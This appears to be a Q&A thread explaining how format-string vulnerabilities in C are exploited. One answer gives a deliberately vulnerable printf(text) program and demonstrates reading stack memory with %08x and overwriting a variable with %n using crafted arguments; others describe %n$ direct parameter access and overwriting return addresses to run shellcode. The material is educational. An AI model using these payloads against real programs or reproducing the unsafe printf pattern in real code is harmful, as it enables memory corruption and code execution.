How can a Format-String vulnerability be exploited?

79,067

Solution 1

You may be able to exploit a format string vulnerability in many ways, directly or indirectly. Let's use the following as an example (assuming no relevant OS protections, which is very rare anyways):

int main(int argc, char **argv)
{
    char text[1024];
    static int some_value = -72;

    strcpy(text, argv[1]); /* ignore the buffer overflow here */

    printf("This is how you print correctly:\n");
    printf("%s", text);
    printf("This is how not to print:\n");
    printf(text);

    printf("some_value @ 0x%08x = %d [0x%08x]", &some_value, some_value, some_value);
    return(0);
}

The basis of this vulnerability is the behaviour of functions with variable arguments. A function which implements handling of a variable number of parameters has to read them from the stack, essentially. If we specify a format string that will make printf() expect two integers on the stack, and we provide only one parameter, the second one will have to be something else on the stack. By extension, and if we have control over the format string, we can have the two most fundamental primitives:


Reading from arbitrary memory addresses

[EDIT] IMPORTANT: I'm making some assumptions about the stack frame layout here. You can ignore them if you understand the basic premise behind the vulnerability, and they vary across OS, platform, program and configuration anyways.

It's possible to use the %s format parameter to read data. You can read the data of the original format string in printf(text), hence you can use it to read anything off the stack:

./vulnerable AAAA%08x.%08x.%08x.%08x
This is how you print correctly:
AAAA%08x.%08x.%08x.%08x
This is how not to print:
AAAA.XXXXXXXX.XXXXXXXX.XXXXXXXX.41414141
some_value @ 0x08049794 = -72 [0xffffffb8]

Writing to arbitrary memory addresses

You can use the %n format specifier to write to an arbitrary address (almost). Again, let's assume our vulnerable program above, and let's try changing the value of some_value, which is located at 0x08049794, as seen above:

./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
This is how you print correctly:
??%08x.%08x.%08x.%n
This is how not to print:
??XXXXXXXX.XXXXXXXX.XXXXXXXX.
some_value @ 0x08049794 = 31 [0x0000001f]

We've overwritten some_value with the number of bytes written before the %n specifier was encountered (man printf). We can use the format string itself, or field width to control this value:

./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n
This is how you print correctly:
??%x%x%x%n
This is how not to print:
??XXXXXXXXXXXXXXXXXXXXXXXX
some_value @ 0x08049794 = 21 [0x00000015]

There are many possibilities and tricks to try (direct parameter access, large field width making wrap-around possible, building your own primitives), and this just touches the tip of the iceberg. I would suggest reading more articles on fmt string vulnerabilities (Phrack has some mostly excellent ones, although they may be a little advanced) or a book which touches on the subject.


Disclaimer: the examples are taken [although not verbatim] from the book Hacking: The art of exploitation (2nd ed) by Jon Erickson.

Solution 2

It is interesting that no-one has mentioned the n$ notation supported by POSIX. If you can control the format string as the attacker, you can use notations such as:

"%200$p"

to read the 200th item on the stack (if there is one). The intention is that you should list all the n$ numbers from 1 to the maximum, and it provides a way of resequencing how the parameters appear in a format string, which is handy when dealing with I18N (L10N, G11N, M18N*).

However, some (probably most) systems are somewhat lackadaisical about how they validate the n$ values and this can lead to abuse by attackers who can control the format string. Combined with the %n format specifier, this can lead to writing at pointer locations.


* The acronyms I18N, L10N, G11N and M18N are for internationalization, localization, globalization, and multinationalization respectively. The number represents the number of omitted letters.

Solution 3

Ah, the answer is in the article!

Uncontrolled format string is a type of software vulnerability, discovered around 1999, that can be used in security exploits. Previously thought harmless, format string exploits can be used to crash a program or to execute harmful code.

A typical exploit uses a combination of these techniques to force a program to overwrite the address of a library function or the return address on the stack with a pointer to some malicious shellcode. The padding parameters to format specifiers are used to control the number of bytes output and the %x token is used to pop bytes from the stack until the beginning of the format string itself is reached. The start of the format string is crafted to contain the address that the %n format token can then overwrite with the address of the malicious code to execute.

This is because %n causes printf to write data to a variable, which is on the stack. But that means it could write to something arbitrarily. All you need is for someone to use that variable (it's relatively easy if it happens to be a function pointer, whose value you just figured out how to control) and they can make you execute anything arbitrarily.

Take a look at the links in the article; they look interesting.

Solution 4

I would recommend reading this lecture note about format string vulnerability. It describes in details what happens and how, and has some images that might help you to understand the topic.

Share:
79,067
Atul Goyal
Author by

Atul Goyal

Traveler, blogger, techie. I'm building a travel startup - MyWanderlust to make travel research easier See Atul Goyal's travel diaries on MyWanderlust.in

Updated on July 05, 2022

Comments

  • Atul Goyal
    Atul Goyal almost 2 years

    I was reading about vulnerabilities in code and came across this Format-String Vulnerability.

    Wikipedia says:

    Format string bugs most commonly appear when a programmer wishes to print a string containing user supplied data. The programmer may mistakenly write printf(buffer) instead of printf("%s", buffer). The first version interprets buffer as a format string, and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended.

    I got the problem with printf(buffer) version, but I still didn't get how this vulnerability can be used by attacker to execute harmful code. Can someone please tell me how this vulnerability can be exploited by an example?